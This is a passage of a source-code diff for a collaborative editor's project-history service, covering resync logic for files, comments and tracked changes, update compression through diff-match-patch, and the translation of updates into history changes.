this.origin, + ts: update.meta.ts, + }, + } + + if ('doc' in entity) { + update.doc = entity.doc + update.docLines = '' + // we have to create a dummy entry here because later we will need the content in the diff computation + this.files[update.pathname] = File.fromString('') + } else { + update.file = entity.file + if (entity.url) update.url = entity.url + if (entity._hash) update.hash = entity._hash + if (entity.createdBlob) update.createdBlob = entity.createdBlob + if (entity.metadata) update.metadata = entity.metadata + } + + this.expandedUpdates.push(update) + Metrics.inc('project_history_resync_operation', 1, { + status: 'add missing file', + }) + } + } + + queueSetMetadataOpsForLinkedFiles(update) { + const allEntities = update.resyncProjectStructure.docs.concat( + update.resyncProjectStructure.files + ) + for (const file of allEntities) { + const pathname = UpdateTranslator._convertPathname(file.path) + const matchingAddFileOperation = this.expandedUpdates.some( + // Look for an addFile operation that already syncs the metadata. + u => u.pathname === pathname && u.metadata === file.metadata + ) + if (matchingAddFileOperation) continue + const metaData = this.files[pathname].getMetadata() + + let shouldUpdate = false + if (file.metadata) { + // check for in place update of linked-file + shouldUpdate = Object.entries(file.metadata).some( + ([k, v]) => metaData[k] !== v + ) + } else if (metaData.provider) { + // overwritten by non-linked-file with same hash + // or overwritten by doc + shouldUpdate = true + } + if (!shouldUpdate) continue + + this.expandedUpdates.push({ + pathname, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + metadata: file.metadata || {}, + }) + Metrics.inc('project_history_resync_operation', 1, { + status: 'update metadata', + }) + } + } + + queueUpdateForOutOfSyncBinaryFiles(update, expectedFiles, persistedFiles) { + // create a map to lookup persisted files by their path + const persistedFileMap = new Map(persistedFiles.map(x => [x.path, x])) + // now search for files with same path but different hash values + const differentFiles = expectedFiles.filter(expected => { + // check for a persisted file at the same path + const expectedPath = expected.path + const persistedFileAtSamePath = persistedFileMap.get(expectedPath) + if (!persistedFileAtSamePath) return false + // check if the persisted file at the same path has a different hash + const expectedHash = _.get(expected, '_hash') + const persistedHash = _.get(persistedFileAtSamePath, ['data', 'hash']) + const hashesPresent = expectedHash && persistedHash + return hashesPresent && persistedHash !== expectedHash + }) + for (const entity of differentFiles) { + // remove the outdated persisted file + const removeUpdate = { + pathname: entity.path, + new_pathname: '', + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + } + this.expandedUpdates.push(removeUpdate) + // add the new file content + const addUpdate = { + pathname: entity.path, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + file: entity.file, + } + if (entity.url) addUpdate.url = entity.url + if (entity._hash) addUpdate.hash = entity._hash + if (entity.createdBlob) addUpdate.createdBlob = entity.createdBlob + if (entity.metadata) addUpdate.metadata = entity.metadata + this.expandedUpdates.push(addUpdate) + Metrics.inc('project_history_resync_operation', 1, { + status: 'update binary file contents', + }) + } + } + + /** + * Expand a resyncDocContentUpdate + * + * @param {ResyncDocContentUpdate} update + */ + async expandResyncDocContentUpdate(update) { + const pathname = UpdateTranslator._convertPathname(update.path) + const snapshotFile = this.files[pathname] + const expectedFile = update.resyncDocContent + const expectedContent = expectedFile.content + + if (!snapshotFile) { + throw new OError('unrecognised file: not in snapshot') + } + + // Compare hashes to see if the persisted file matches the expected content. + // The hash of the persisted files is stored in the snapshot. + // Note getHash() returns the hash only when the persisted file has + // no changes in the snapshot, the hash is null if there are changes + // that apply to it. + let hashesMatch = false + const persistedHash = snapshotFile.getHash() + if (persistedHash != null) { + const expectedHash = HashManager._getBlobHashFromString(expectedContent) + if (persistedHash === expectedHash) { + logger.debug( + { projectId: this.projectId, persistedHash, expectedHash }, + 'skipping diff because hashes match and persisted file has no ops' + ) + hashesMatch = true + } + } else { + logger.debug('cannot compare hashes, will retrieve content') + } + + // compute the difference between the expected and persisted content + const historyId = await WebApiManager.promises.getHistoryId(this.projectId) + const file = await snapshotFile.load( + 'eager', + HistoryStoreManager.getBlobStore(historyId) + ) + const persistedContent = file.getContent() + if (persistedContent == null) { + // This should not happen given that we loaded the file eagerly. We could + // probably refine the types in overleaf-editor-core so that this check + // wouldn't be necessary. + throw new Error('File was not properly loaded') + } + + if (!hashesMatch) { + const expandedUpdate = await this.queueUpdateForOutOfSyncContent( + update, + pathname, + persistedContent, + expectedContent + ) + if (expandedUpdate != null) { + // Adjust the ranges for the changes that have been made to the content + for (const op of expandedUpdate.op) { + if (isInsert(op)) { + file.getComments().applyInsert(new Range(op.p, op.i.length)) + file.getTrackedChanges().applyInsert(op.p, op.i) + } else if (isDelete(op)) { + file.getComments().applyDelete(new Range(op.p, op.d.length)) + file.getTrackedChanges().applyDelete(op.p, op.d.length) + } + } + } + } + + const persistedComments = file.getComments().toArray() + await this.queueUpdatesForOutOfSyncComments( + update, + pathname, + persistedComments + ) + + const persistedChanges = file.getTrackedChanges().asSorted() + await this.queueUpdatesForOutOfSyncTrackedChanges( + update, + pathname, + persistedChanges + ) + } + + /** + * Queue update for out of sync content + * + * @param {ResyncDocContentUpdate} update + * @param {string} pathname + * @param {string} persistedContent + * @param {string} expectedContent + */ + async queueUpdateForOutOfSyncContent( + update, + pathname, + persistedContent, + expectedContent + ) { + logger.debug( + { projectId: this.projectId, persistedContent, expectedContent }, + 'diffing doc contents' + ) + const op = UpdateCompressor.diffAsShareJsOps( + persistedContent, + expectedContent + ) + if (op.length === 0) { + return null + } + const expandedUpdate = { + doc: update.doc, + op, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + pathname, + doc_length: persistedContent.length, + }, + } + logger.debug( + { projectId: this.projectId, diffCount: op.length }, + 'doc contents differ' + ) + this.expandedUpdates.push(expandedUpdate) + Metrics.inc('project_history_resync_operation', 1, { + status: 'update text file contents', + }) + return expandedUpdate + } + + /** + * Queue updates for out of sync comments + * + * @param {ResyncDocContentUpdate} update + * @param {string} pathname + * @param {HistoryComment[]} persistedComments + */ + async queueUpdatesForOutOfSyncComments(update, pathname, persistedComments) { + const expectedContent = update.resyncDocContent.content + const expectedComments = update.resyncDocContent.ranges?.comments ?? [] + const resolvedCommentIds = new Set( + update.resyncDocContent.resolvedCommentIds ?? [] + ) + const expectedCommentsById = new Map( + expectedComments.map(comment => [comment.id, comment]) + ) + const persistedCommentsById = new Map( + persistedComments.map(comment => [comment.id, comment]) + ) + + // Delete any persisted comment that is not in the expected comment list. + for (const persistedComment of persistedComments) { + if (!expectedCommentsById.has(persistedComment.id)) { + this.expandedUpdates.push({ + pathname, + deleteComment: persistedComment.id, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + }) + } + } + + for (const expectedComment of expectedComments) { + const persistedComment = persistedCommentsById.get(expectedComment.id) + const expectedCommentResolved = resolvedCommentIds.has(expectedComment.id) + if ( + persistedComment != null && + commentRangesAreInSync(persistedComment, expectedComment) + ) { + if (expectedCommentResolved === persistedComment.resolved) { + // Both comments are identical; do nothing + } else { + // Only the resolved state differs + this.expandedUpdates.push({ + pathname, + commentId: expectedComment.id, + resolved: expectedCommentResolved, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + }) + } + } else { + const op = { ...expectedComment.op, resolved: expectedCommentResolved } + // New comment or ranges differ + this.expandedUpdates.push({ + doc: update.doc, + op: [op], + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + pathname, + doc_length: expectedContent.length, + }, + }) + } + } + } + + /** + * Queue updates for out of sync tracked changes + * + * @param {ResyncDocContentUpdate} update + * @param {string} pathname + * @param {readonly HistoryTrackedChange[]} persistedChanges + */ + async queueUpdatesForOutOfSyncTrackedChanges( + update, + pathname, + persistedChanges + ) { + const expectedChanges = update.resyncDocContent.ranges?.changes ?? [] + const expectedContent = update.resyncDocContent.content + + /** + * A cursor on the expected content + */ + let cursor = 0 + + /** + * The persisted tracking at cursor + * + * @type {TrackingDirective} + */ + let persistedTracking = { type: 'none' } + + /** + * The expected tracking at cursor + * + * @type {TrackingDirective} + */ + let expectedTracking = { type: 'none' } + + /** + * The retain ops for the update + * + * @type {RetainOp[]} + */ + const ops = [] + + /** + * The retain op being built + * + * @type {RetainOp | null} + */ + let currentOp = null + + for (const transition of getTrackedChangesTransitions( + persistedChanges, + expectedChanges, + expectedContent.length + )) { + if (transition.pos > cursor) { + // The next transition will move the cursor. Decide what to do with the interval. + if (trackingDirectivesEqual(expectedTracking, persistedTracking)) { + // Expected tracking and persisted tracking are in sync. Emit the + // current op and skip this interval. + if (currentOp != null) { + ops.push(currentOp) + currentOp = null + } + } else { + // Expected tracking and persisted tracking are different. + const retainedText = expectedContent.slice(cursor, transition.pos) + if ( + currentOp?.tracking != null && + trackingDirectivesEqual(expectedTracking, currentOp.tracking) + ) { + // The current op has the right tracking. Extend it. + currentOp.r += retainedText + } else { + // The current op doesn't have the right tracking. Emit the current + // op and start a new one. + if (currentOp != null) { + ops.push(currentOp) + } + currentOp = { + r: retainedText, + p: cursor, + tracking: expectedTracking, + } + } + } + + // Advance cursor + cursor = transition.pos + } + + // Update the expected and persisted tracking + if (transition.stage === 'persisted') { + persistedTracking = transition.tracking + } else { + expectedTracking = transition.tracking + } + } + + // Emit the last op + if (currentOp != null) { + ops.push(currentOp) + } + + if (ops.length > 0) { + this.expandedUpdates.push({ + doc: update.doc, + op: ops, + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + pathname, + doc_length: expectedContent.length, + }, + }) + } + } +} + +/** + * Compares the ranges in the persisted and expected comments + * + * @param {HistoryComment} persistedComment + * @param {Comment} expectedComment + */ +function commentRangesAreInSync(persistedComment, expectedComment) { + const expectedPos = expectedComment.op.hpos ?? expectedComment.op.p + const expectedLength = expectedComment.op.hlen ?? expectedComment.op.c.length + if (expectedLength === 0) { + // A zero length comment from RangesManager is a detached comment in history + return persistedComment.ranges.length === 0 + } + + if (persistedComment.ranges.length !== 1) { + // The editor only supports single range comments + return false + } + const persistedRange = persistedComment.ranges[0] + return ( + persistedRange.pos === expectedPos && + persistedRange.length === expectedLength + ) +} + +/** + * Iterates through expected tracked changes and persisted tracked changes and + * returns all transitions, sorted by position. + * + * @param {readonly HistoryTrackedChange[]} persistedChanges + * @param {TrackedChange[]} expectedChanges + * @param {number} docLength + */ +function getTrackedChangesTransitions( + persistedChanges, + expectedChanges, + docLength +) { + /** @type {TrackedChangeTransition[]} */ + const transitions = [] + + for (const change of persistedChanges) { + transitions.push({ + stage: 'persisted', + pos: change.range.start, + tracking: { + type: change.tracking.type, + userId: change.tracking.userId, + ts: change.tracking.ts.toISOString(), + }, + }) + transitions.push({ + stage: 'persisted', + pos: change.range.end, + tracking: { type: 'none' }, + }) + } + + for (const change of expectedChanges) { + const op = change.op + const pos = op.hpos ?? op.p + if (isInsert(op)) { + transitions.push({ + stage: 'expected', + pos, + tracking: { + type: 'insert', + userId: change.metadata.user_id, + ts: change.metadata.ts, + }, + }) + transitions.push({ + stage: 'expected', + pos: pos + op.i.length, + tracking: { type: 'none' }, + }) + } else { + transitions.push({ + stage: 'expected', + pos, + tracking: { + type: 'delete', + userId: change.metadata.user_id, + ts: change.metadata.ts, + }, + }) + transitions.push({ + stage: 'expected', + pos: pos + op.d.length, + tracking: { type: 'none' }, + }) + } + } + + transitions.push({ + stage: 'expected', + pos: docLength, + tracking: { type: 'none' }, + }) + + transitions.sort((a, b) => { + if (a.pos < b.pos) { + return -1 + } else if (a.pos > b.pos) { + return 1 + } else if (a.tracking.type === 'none' && b.tracking.type !== 'none') { + // none type comes before other types so that it can be overridden at the + // same position + return -1 + } else if (a.tracking.type !== 'none' && b.tracking.type === 'none') { + // none type comes before other types so that it can be overridden at the + // same position + return 1 + } else { + return 0 + } + }) + + return transitions +} + +/** + * Returns true if both tracking directives are equal + * + * @param {TrackingDirective} a + * @param {TrackingDirective} b + */ +function trackingDirectivesEqual(a, b) { + if (a.type === 'none') { + return b.type === 'none' + } else { + return a.type === b.type && a.userId === b.userId && a.ts === b.ts + } +} + +// EXPORTS + +const startResyncCb = callbackify(startResync) +const startResyncWithoutLockCb = callbackify(startResyncWithoutLock) +const startHardResyncCb = callbackify(startHardResync) +const setResyncStateCb = callbackify(setResyncState) +const clearResyncStateCb = callbackify(clearResyncState) +const skipUpdatesDuringSyncCb = callbackifyMultiResult(skipUpdatesDuringSync, [ + 'updates', + 'syncState', +]) + +/** + * @param {string} projectId + * @param {string} projectHistoryId + * @param {{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}} mostRecentChunk + * @param {Array<Update>} updates + * @param {() => void} extendLock + * @param {(err: Error | null, updates?: Array<Update>) => void} callback + */ +const expandSyncUpdatesCb = ( + projectId, + projectHistoryId, + mostRecentChunk, + updates, + extendLock, + callback +) => { + const extendLockPromises = promisify(extendLock) + expandSyncUpdates( + projectId, + projectHistoryId, + mostRecentChunk, + updates, + extendLockPromises + ) + .then(result => { + callback(null, result) + }) + .catch(err => { + callback(err) + }) +} + +export { + startResyncCb as startResync, + startResyncWithoutLockCb as startResyncWithoutLock, + startHardResyncCb as startHardResync, + setResyncStateCb as setResyncState, + clearResyncStateCb as clearResyncState, + skipUpdatesDuringSyncCb as skipUpdatesDuringSync, + expandSyncUpdatesCb as expandSyncUpdates, +} + +export const promises = { + startResync, + startResyncWithoutLock, + startHardResync, + setResyncState, + clearResyncState, + clearResyncStateIfAllAfter, + skipUpdatesDuringSync, + expandSyncUpdates, +} diff --git a/services/project-history/app/js/UpdateCompressor.js b/services/project-history/app/js/UpdateCompressor.js new file mode 100644 index 0000000..b548b75 --- /dev/null +++ b/services/project-history/app/js/UpdateCompressor.js @@ -0,0 +1,491 @@ +// @ts-check + +import OError from '@overleaf/o-error' +import DMP from 'diff-match-patch' + +/** + * @import { DeleteOp, InsertOp, Op, Update } from './types' + */ + +const MAX_TIME_BETWEEN_UPDATES = 60 * 1000 // one minute +const MAX_UPDATE_SIZE = 2 * 1024 * 1024 // 2 MB +const ADDED = 1 +const REMOVED = -1 +const UNCHANGED = 0 + +const strInject = (s1, pos, s2) => s1.slice(0, pos) + s2 + s1.slice(pos) +const strRemove = (s1, pos, length) => s1.slice(0, pos) + s1.slice(pos + length) + +const dmp = new DMP() +dmp.Diff_Timeout = 0.1 // prevent the diff algorithm from searching too hard for changes in unrelated content + +const cloneWithOp = function (update, op) { + // to improve performance, shallow clone the update + // and its meta property (also an object), then + // overwrite the op property directly. + update = Object.assign({}, update) + update.meta = Object.assign({}, update.meta) + update.op = op + return update +} +const mergeUpdatesWithOp = function (firstUpdate, secondUpdate, op) { + // We want to take doc_length and ts from the firstUpdate, v and doc_hash from the second + const update = cloneWithOp(firstUpdate, op) + if (secondUpdate.v != null) { + update.v = secondUpdate.v + } + if (secondUpdate.meta.doc_hash != null) { + update.meta.doc_hash = secondUpdate.meta.doc_hash + } else { + delete update.meta.doc_hash + } + return update +} + +/** + * Adjust the given length to account for the given op + * + * The resulting length is the new length of the doc after the op is applied. + * + * @param {number} length + * @param {Op} op + * @param {object} opts + * @param {boolean} [opts.tracked] - whether or not the update is a tracked change + * @returns {number} the adjusted length + */ +function adjustLengthByOp(length, op, opts = {}) { + if ('i' in op && op.i != null) { + if (op.trackedDeleteRejection) { + // Tracked delete rejection: will be translated into a retain + return length + } else { + return length + op.i.length + } + } else if ('d' in op && op.d != null) { + if (opts.tracked) { + // Tracked delete: will be translated into a retain, except where it overlaps tracked inserts. + for (const change of op.trackedChanges ?? []) { + if (change.type === 'insert') { + length -= change.length + } + } + return length + } else { + return length - op.d.length + } + } else if ('r' in op && op.r != null) { + return length + } else if ('c' in op && op.c != null) { + return length + } else { + throw new OError('unexpected op type') + } +} + +/** + * Updates come from the doc updater in format + * { + * op: [ { ... op1 ... }, { ... op2 ... } ] + * meta: { ts: ..., user_id: ... } + * } + * but it's easier to work with on op per update, so convert these updates to + * our compressed format + * [{ + * op: op1 + * meta: { ts: ..., user_id: ... } + * }, { + * op: op2 + * meta: { ts: ..., user_id: ... } + * }] + * + * @param {Update[]} updates + * @returns {Update[]} single op updates + */ +export function convertToSingleOpUpdates(updates) { + const splitUpdates = [] + for (const update of updates) { + if (!('op' in update)) { + // Not a text op, likely a project strucure op + splitUpdates.push(update) + continue + } + const ops = update.op + + let docLength = update.meta.history_doc_length ?? update.meta.doc_length + // Temporary fix for document-updater sending a length of -1 for empty + // documents. This can be removed after all queues have been flushed. + if (docLength === -1) { + docLength = 0 + } + const docHash = update.meta.doc_hash + for (const op of ops) { + const splitUpdate = cloneWithOp(update, op) + // Only the last update will keep the doc_hash property + delete splitUpdate.meta.doc_hash + if (docLength != null) { + splitUpdate.meta.doc_length = docLength + docLength = adjustLengthByOp(docLength, op, { + tracked: update.meta.tc != null, + }) + delete splitUpdate.meta.history_doc_length + } + splitUpdates.push(splitUpdate) + } + if (docHash != null && splitUpdates.length > 0) { + splitUpdates[splitUpdates.length - 1].meta.doc_hash = docHash + } + } + return splitUpdates +} + +export function filterBlankUpdates(updates) { + // Diffing an insert and delete can return blank inserts and deletes + // which the OL history service doesn't have an equivalent for. + // + // NOTE: this relies on the updates only containing either op.i or op.d entries + // but not both, which is the case because diffAsShareJsOps does this + return updates.filter( + update => !(update.op && (update.op.i === '' || update.op.d === '')) + ) +} + +export function concatUpdatesWithSameVersion(updates) { + const concattedUpdates = [] + for (let update of updates) { + if (update.op != null) { + update = cloneWithOp(update, [update.op]) + + const lastUpdate = concattedUpdates[concattedUpdates.length - 1] + if ( + lastUpdate != null && + lastUpdate.op != null && + lastUpdate.v === update.v && + lastUpdate.doc === update.doc && + lastUpdate.pathname === update.pathname + ) { + lastUpdate.op = lastUpdate.op.concat(update.op) + if (update.meta.doc_hash == null) { + delete lastUpdate.meta.doc_hash + } else { + lastUpdate.meta.doc_hash = update.meta.doc_hash + } + } else { + concattedUpdates.push(update) + } + } else { + concattedUpdates.push(update) + } + } + return concattedUpdates +} + +export function compressRawUpdates(rawUpdates) { + let updates = convertToSingleOpUpdates(rawUpdates) + updates = compressUpdates(updates) + updates = filterBlankUpdates(updates) + updates = concatUpdatesWithSameVersion(updates) + return updates +} + +export function compressUpdates(updates) { + if (updates.length === 0) { + return [] + } + + let compressedUpdates = [updates.shift()] + for (const update of updates) { + const lastCompressedUpdate = compressedUpdates.pop() + if (lastCompressedUpdate != null) { + const newCompressedUpdates = _concatTwoUpdates( + lastCompressedUpdate, + update + ) + + compressedUpdates = compressedUpdates.concat(newCompressedUpdates) + } else { + compressedUpdates.push(update) + } + } + + return compressedUpdates +} + +/** + * If possible, merge two updates into a single update that has the same effect. + * + * It's useful to do some of this work at this point while we're dealing with + * document-updater updates. The deletes, in particular include the deleted + * text. This allows us to find pieces of inserts and deletes that cancel each + * other out because they insert/delete the exact same text. This compression + * makes the diff smaller. + */ +function _concatTwoUpdates(firstUpdate, secondUpdate) { + // Previously we cloned firstUpdate and secondUpdate at this point but we + // can skip this step because whenever they are returned with + // modification there is always a clone at that point via + // mergeUpdatesWithOp. + + if (firstUpdate.op == null || secondUpdate.op == null) { + // Project structure ops + return [firstUpdate, secondUpdate] + } + + if ( + firstUpdate.doc !== secondUpdate.doc || + firstUpdate.pathname !== secondUpdate.pathname + ) { + return [firstUpdate, secondUpdate] + } + + if (firstUpdate.meta.user_id !== secondUpdate.meta.user_id) { + return [firstUpdate, secondUpdate] + } + + if ( + (firstUpdate.meta.type === 'external' && + secondUpdate.meta.type !== 'external') || + (firstUpdate.meta.type !== 'external' && + secondUpdate.meta.type === 'external') || + (firstUpdate.meta.type === 'external' && + secondUpdate.meta.type === 'external' && + firstUpdate.meta.source !== secondUpdate.meta.source) + ) { + return [firstUpdate, secondUpdate] + } + + if (secondUpdate.meta.ts - firstUpdate.meta.ts > MAX_TIME_BETWEEN_UPDATES) { + return [firstUpdate, secondUpdate] + } + + if ( + (firstUpdate.meta.tc == null && secondUpdate.meta.tc != null) || + (firstUpdate.meta.tc != null && secondUpdate.meta.tc == null) + ) { + // One update is tracking changes and the other isn't. Tracking changes + // results in different behaviour in the history, so we need to keep these + // two updates separate. + return [firstUpdate, secondUpdate] + } + + if (Boolean(firstUpdate.op.u) !== Boolean(secondUpdate.op.u)) { + // One update is an undo and the other isn't. If we were to merge the two + // updates, we would have to choose one value for the flag, which would be + // partially incorrect. Moreover, a tracked delete that is also an undo is + // treated as a tracked insert rejection by the history, so these updates + // need to be well separated. + return [firstUpdate, secondUpdate] + } + + if ( + firstUpdate.op.trackedDeleteRejection || + secondUpdate.op.trackedDeleteRejection + ) { + // Do not merge tracked delete rejections. Each tracked delete rejection is + // a separate operation. + return [firstUpdate, secondUpdate] + } + + if ( + firstUpdate.op.trackedChanges != null || + secondUpdate.op.trackedChanges != null + ) { + // Do not merge ops that span tracked changes. + // TODO: This could theoretically be handled, but it would be complex. One + // would need to take tracked deletes into account when merging inserts and + // deletes together. + return [firstUpdate, secondUpdate] + } + + const firstOp = firstUpdate.op + const secondOp = secondUpdate.op + const firstSize = + (firstOp.i && firstOp.i.length) || (firstOp.d && firstOp.d.length) + const secondSize = + (secondOp.i && secondOp.i.length) || (secondOp.d && secondOp.d.length) + const firstOpInsideSecondOp = + secondOp.p <= firstOp.p && firstOp.p <= secondOp.p + secondSize + const secondOpInsideFirstOp = + firstOp.p <= secondOp.p && secondOp.p <= firstOp.p + firstSize + const combinedLengthUnderLimit = firstSize + secondSize < MAX_UPDATE_SIZE + + // Two inserts + if ( + firstOp.i != null && + secondOp.i != null && + secondOpInsideFirstOp && + combinedLengthUnderLimit && + insertOpsInsideSameComments(firstOp, secondOp) + ) { + return [ + mergeUpdatesWithOp(firstUpdate, secondUpdate, { + ...firstOp, + i: strInject(firstOp.i, secondOp.p - firstOp.p, secondOp.i), + }), + ] + } + + // Two deletes + if ( + firstOp.d != null && + secondOp.d != null && + firstOpInsideSecondOp && + combinedLengthUnderLimit && + firstUpdate.meta.tc == null && + secondUpdate.meta.tc == null + ) { + return [ + mergeUpdatesWithOp(firstUpdate, secondUpdate, { + ...secondOp, + d: strInject(secondOp.d, firstOp.p - secondOp.p, firstOp.d), + }), + ] + } + + // An insert and then a delete + if ( + firstOp.i != null && + secondOp.d != null && + secondOpInsideFirstOp && + firstUpdate.meta.tc == null && + secondUpdate.meta.tc == null + ) { + const offset = secondOp.p - firstOp.p + const insertedText = firstOp.i.slice(offset, offset + secondOp.d.length) + // Only trim the insert when the delete is fully contained within in it + if (insertedText === secondOp.d) { + const insert = strRemove(firstOp.i, offset, secondOp.d.length) + if (insert === '') { + return [] + } else { + return [ + mergeUpdatesWithOp(firstUpdate, secondUpdate, { + ...firstOp, + i: insert, + }), + ] + } + } else { + // This will only happen if the delete extends outside the insert + return [firstUpdate, secondUpdate] + } + } + + // A delete then an insert at the same place, likely a copy-paste of a chunk of content + if ( + firstOp.d != null && + secondOp.i != null && + firstOp.p === secondOp.p && + firstUpdate.meta.tc == null && + secondUpdate.meta.tc == null + ) { + const offset = firstOp.p + const hoffset = firstOp.hpos + const diffUpdates = diffAsShareJsOps(firstOp.d, secondOp.i).map( + function (op) { + // diffAsShareJsOps() returns ops with positions relative to the position + // of the copy/paste. We need to adjust these positions so that they + // apply to the whole document instead. + const pos = op.p + op.p = pos + offset + if (hoffset != null) { + op.hpos = pos + hoffset + } + if (firstOp.u && secondOp.u) { + op.u = true + } + if ('i' in op && secondOp.commentIds != null) { + // Make sure that commentIds metadata is propagated to inserts + op.commentIds = secondOp.commentIds + } + const update = mergeUpdatesWithOp(firstUpdate, secondUpdate, op) + // Set the doc hash only on the last update + delete update.meta.doc_hash + return update + } + ) + const docHash = secondUpdate.meta.doc_hash + if (docHash != null && diffUpdates.length > 0) { + diffUpdates[diffUpdates.length - 1].meta.doc_hash = docHash + } + + // Doing a diff like this loses track of the doc lengths for each + // update, so recalculate them + let docLength = + firstUpdate.meta.history_doc_length ?? firstUpdate.meta.doc_length + for (const update of diffUpdates) { + update.meta.doc_length = docLength + docLength = adjustLengthByOp(docLength, update.op, { + tracked: update.meta.tc != null, + }) + delete update.meta.history_doc_length + } + + return diffUpdates + } + + return [firstUpdate, secondUpdate] +} + +/** + * Return the diff between two strings + * + * @param {string} before + * @param {string} after + * @returns {(InsertOp | DeleteOp)[]} the ops that generate that diff + */ +export function diffAsShareJsOps(before, after) { + const diffs = dmp.diff_main(before, after) + dmp.diff_cleanupSemantic(diffs) + + const ops = [] + let position = 0 + for (const diff of diffs) { + const type = diff[0] + const content = diff[1] + if (type === ADDED) { + ops.push({ + i: content, + p: position, + }) + position += content.length + } else if (type === REMOVED) { + ops.push({ + d: content, + p: position, + }) + } else if (type === UNCHANGED) { + position += content.length + } else { + throw new Error('Unknown type') + } + } + return ops +} + +/** + * Checks if two insert ops are inside the same comments + * + * @param {InsertOp} op1 + * @param {InsertOp} op2 + * @returns {boolean} + */ +function insertOpsInsideSameComments(op1, op2) { + const commentIds1 = op1.commentIds + const commentIds2 = op2.commentIds + if (commentIds1 == null && commentIds2 == null) { + // None are inside comments + return true + } + + if ( + commentIds1 != null && + commentIds2 != null && + commentIds1.every(id => commentIds2.includes(id)) && + commentIds2.every(id => commentIds1.includes(id)) + ) { + // Both are inside the same comments + return true + } + + return false +} diff --git a/services/project-history/app/js/UpdateTranslator.js b/services/project-history/app/js/UpdateTranslator.js new file mode 100644 index 0000000..38e65f6 --- /dev/null +++ b/services/project-history/app/js/UpdateTranslator.js @@ -0,0 +1,487 @@ +// @ts-check + +import _ from 'lodash' +import Core from 'overleaf-editor-core' +import * as Errors from './Errors.js' +import * as OperationsCompressor from './OperationsCompressor.js' +import { isInsert, isRetain, isDelete, isComment } from './Utils.js' + +/** + * @import { AddDocUpdate, AddFileUpdate, DeleteCommentUpdate, Op, RawScanOp } from './types' + * @import { RenameUpdate, TextUpdate, TrackingDirective, TrackingProps } from './types' + * @import { SetCommentStateUpdate, SetFileMetadataOperation, Update, UpdateWithBlob } from './types' + */ + +/** + * Convert updates into history changes + * + * @param {string} projectId + * @param {UpdateWithBlob[]} updatesWithBlobs + * @returns {Array<Core.Change | null>} + */ +export function convertToChanges(projectId, updatesWithBlobs) { + return updatesWithBlobs.map(update => _convertToChange(projectId, update)) +} + +/** + * Convert an update into a history change + * + * @param {string} projectId + * @param {UpdateWithBlob} updateWithBlob + * @returns {Core.Change | null} + */ +function _convertToChange(projectId, updateWithBlob) { + let operations + const { update } = updateWithBlob + + let projectVersion = null + const v2DocVersions = {} + + if (_isRenameUpdate(update)) { + operations = [ + { + pathname: _convertPathname(update.pathname), + newPathname: _convertPathname(update.new_pathname), + }, + ] + projectVersion = update.version + } else if (isAddUpdate(update)) { + const op = { + pathname: _convertPathname(update.pathname), + file: { + hash: updateWithBlob.blobHashes.file, + }, + } + if (_isAddDocUpdate(update)) { + op.file.rangesHash = updateWithBlob.blobHashes.ranges + } + if (_isAddFileUpdate(update)) { + op.file.metadata = update.metadata + } + operations = [op] + projectVersion = update.version + } else if (isTextUpdate(update)) { + const docLength = update.meta.history_doc_length ?? update.meta.doc_length + let pathname = update.meta.pathname + + pathname = _convertPathname(pathname) + const builder = new OperationsBuilder(docLength, pathname) + // convert ops + for (const op of update.op) { + builder.addOp(op, update) + } + // add doc hash if present + if (update.meta.doc_hash != null) { + // This will commit the text operation that the builder is currently + // building and set the contentHash property. + builder.commitTextOperation({ contentHash: update.meta.doc_hash }) + } + operations = builder.finish() + // add doc version information if present + if (update.v != null) { + v2DocVersions[update.doc] = { pathname, v: update.v } + } + } else if (isSetCommentStateUpdate(update)) { + operations = [ + { + pathname: _convertPathname(update.pathname), + commentId: update.commentId, + resolved: update.resolved, + }, + ] + } else if (isSetFileMetadataOperation(update)) { + operations = [ + { + pathname: _convertPathname(update.pathname), + metadata: update.metadata, + }, + ] + } else if (isDeleteCommentUpdate(update)) { + operations = [ + { + pathname: _convertPathname(update.pathname), + deleteComment: update.deleteComment, + }, + ] + } else { + const error = new Errors.UpdateWithUnknownFormatError( + 'update with unknown format', + { projectId, update } + ) + throw error + } + + let v2Authors + if (update.meta.user_id === 'anonymous-user') { + // history-v1 uses null to represent an anonymous author + v2Authors = [null] + } else { + // user_id is missing on resync operations that update the contents of a doc + v2Authors = _.compact([update.meta.user_id]) + } + + const rawChange = { + operations, + v2Authors, + timestamp: new Date(update.meta.ts).toISOString(), + projectVersion, + v2DocVersions: Object.keys(v2DocVersions).length ? v2DocVersions : null, + } + if (update.meta.origin) { + rawChange.origin = update.meta.origin + } else if (update.meta.type === 'external' && update.meta.source) { + rawChange.origin = { kind: update.meta.source } + } + const change = Core.Change.fromRaw(rawChange) + + if (change != null) { + change.operations = OperationsCompressor.compressOperations( + change.operations + ) + } + + return change +} + +/** + * @param {Update} update + * @returns {update is RenameUpdate} + */ +function _isRenameUpdate(update) { + return 'new_pathname' in update && update.new_pathname != null +} + +/** + * @param {Update} update + * @returns {update is AddDocUpdate} + */ +function _isAddDocUpdate(update) { + return ( + 'doc' in update && + update.doc != null && + 'docLines' in update && + update.docLines != null + ) +} + +/** + * @param {Update} update + * @returns {update is AddFileUpdate} + */ +function _isAddFileUpdate(update) { + return ( + 'file' in update && + update.file != null && + (('createdBlob' in update && update.createdBlob) || + ('url' in update && update.url != null)) + ) +} + +/** + * @param {Update} update + * @returns {update is TextUpdate} + */ +export function isTextUpdate(update) { + return ( + 'doc' in update && + update.doc != null && + 'op' in update && + update.op != null && + 'pathname' in update.meta && + update.meta.pathname != null && + 'doc_length' in update.meta && + update.meta.doc_length != null + ) +} + +export function isProjectStructureUpdate(update) { + return isAddUpdate(update) || _isRenameUpdate(update) +} + +/** + * @param {Update} update + * @returns {update is AddDocUpdate | AddFileUpdate} + */ +export function isAddUpdate(update) { + return _isAddDocUpdate(update) || _isAddFileUpdate(update) +} + +/** + * @param {Update} update + * @returns {update is SetCommentStateUpdate} + */ +export function isSetCommentStateUpdate(update) { + return 'commentId' in update && 'resolved' in update +} + +/** + * @param {Update} update + * @returns {update is DeleteCommentUpdate} + */ +export function 